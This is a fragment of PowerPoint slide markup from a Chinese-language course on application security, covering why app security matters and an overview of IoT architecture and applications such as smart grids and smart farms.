      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4159143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1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>节 应用安全背景及现状</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="矩形 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C362B605-5A22-4F10-9B67-01C17D60C363}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="662318" y="1840974"/>
            <a:ext cx="6096000" cy="3785652"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>各种各样的网络应用丰富着我们的生活</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、轻应用</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>社交网络、微博、微信</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>移动应用、滴滴打车、共享单车</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>CDN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>网络提供后台基石</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>云计算网络提供可即时获得的能力</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>物联网提供各种传感数据，提供高效便捷的生活方式</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>应用安全十分重要</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>各种网络获取并且一般都连接到云环境 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>黑客攻击应用的次数比以往更多 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="Advanced Web Technologies">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BF0CD159-F0B8-4F16-81C1-FE2E92C145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3643" y="1193325"/>
            <a:ext cx="4295857" cy="213002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应用威胁被忽视 部署安全">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{09FD5578-98B1-4D4A-9E0D-0A81861E84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5286" y="3733800"/>
            <a:ext cx="3760363" cy="2820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8873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2.5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>节 物联网</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38079" y="2357709"/>
            <a:ext cx="4845747" cy="2031325"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>物联网</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>(IoT)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>提供了各种传感器和物体的集成，可以直接相互通信，无需人工干预</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>物联网的主要目标是提供一个网络基础设施与互操作通信协议和软件</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>随时在任何网络连接物理</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>虚拟传感器</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>个人电脑</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
              <a:t>pc),</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>智能设备</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>汽车</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>和物品</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>（如冰箱</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>洗碗机</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>微波炉</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>食物</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>药物）</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="GAO Assesses IoT Vulnerabilities - BankInfoSecurity">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D53B10C4-6B53-D841-B53D-A7B36B2D72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826701"/>
            <a:ext cx="5299910" cy="3204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25713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2.5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>节 物联网</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>安全 </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2050" name="Picture 2" descr="Smart Logistics and Technology Shaping the Future of Supply Chains | by  steve jacob | Medium">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6ECD378E-B7AF-1F4F-8757-45329D589B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28762" y="1450224"/>
            <a:ext cx="1044869" cy="85185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到2040智能电网技术将为基础设施节支2700亿美元- 国际电力观察-  售电市场政策-售电平台系统-售电产业服务公司-电力交易中心-能源节能管理服务-大云网">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A21BD6CD-F0AE-4349-92D3-49D1EC4464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4781" y="1571045"/>
            <a:ext cx="948824" cy="731036"/>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5A297820-12D2-9C43-8102-AC2620E26E45}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5115491" y="1958593"/>
            <a:ext cx="612865" cy="181305"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1200" dirty="0"/>
              <a:t>综合服务层</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="文本框 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{76C5D1E3-A139-574D-9752-0EB593C9207C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6244764" y="2302082"/>
            <a:ext cx="612865" cy="181305"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1200" dirty="0"/>
              <a:t>智慧物流</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="文本框 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A297820-12D2-9C43-8102-AC2620E26E45}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7692760" y="2302082"/>
            <a:ext cx="612865" cy="1813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zh-CN" altLang="en-US" sz="1200" dirty="0"/>
              <a:t>智能电网</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2054" name="Picture 6" descr="物联网技术在智能交通中的应用-电子发烧友网">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C105031A-07C0-5347-A8A1-76CC3D92DE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97117" y="1675497"/>
            <a:ext cx="796371" cy="626584"/>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2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{18A30193-9DF7-E044-84ED-8F39FFF86927}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9080623" y="2302082"/>
            <a:ext cx="612865" cy="1813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zh-CN" altLang="en-US" sz="1200" dirty="0"/>
              <a:t>智能交通</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2056" name="Picture 8" descr="7127066智能农场概念图片素材-设计素材-jpg图片格式-mac天空素材下载">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{875CCF9B-1AB9-7144-8C73-F82F1A4D006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21585" y="1446557"/>
            <a:ext cx="931857" cy="845712"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="文本框 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{182DEA95-7B95-0041-8DEF-D88C7F2CE568}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10539784" y="2302082"/>
            <a:ext cx="612865" cy="1813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zh-CN" altLang="en-US" sz="1200" dirty="0"/>
              <a:t>智能农场</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="文本框 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0EDA48E1-AEDE-0D44-8FC0-D1465BF10AE4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5010297" y="2853285"/>
            <a:ext cx="612865" cy="181305"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1200" dirty="0"/>
              <a:t>管理服务层</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2058" name="Picture 10" descr="Why data centers fail to bring new jobs to small towns - TechRepublic">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{01683EED-4BE5-6E45-966C-BEC0C913CD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66554" y="2664691"/>
            <a:ext cx="924104" cy="670552"/>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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2A9B6C7E-0EFE-2B44-9E24-0C187C110AEE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6178619" y="3375052"/>
            <a:ext cx="612865" cy="181305"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1200" dirty="0"/>
              <a:t>数据中心</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2060" name="Picture 12" descr="什么样的标题是搜索引擎喜欢的- 陆壹主题">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C36176B8-72BF-A74D-A314-2C7863A6759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74520" y="2657459"/>
            <a:ext cx="898097" cy="751318"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="文本框 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DF272B26-3207-8D49-8121-FFC03279C6AC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7571601" y="3335244"/>
            <a:ext cx="612865" cy="181305"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1200" dirty="0"/>
              <a:t>搜索引擎</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2062" name="Picture 14" descr="5 Benefits of Data Mining for your Marketing Strategy: Part 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1CF6EBFC-F2AA-5346-90B6-1DC4C346FA5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964583" y="2583925"/>
            <a:ext cx="690273" cy="751318"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="文本框 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1679FFA7-DBA9-B84C-A62B-07C80BF1407B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9126394" y="3318124"/>
            <a:ext cx="612865" cy="181305"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1200" dirty="0"/>
              <a:t>数据挖掘</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2066" name="Picture 18" descr="Unified AIOps - Enable Zero Touch Operations">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{96C7E852-53FF-604B-9DCC-5C37B471C5E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190313" y="2461958"/>
            <a:ext cx="1144548" cy="946818"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
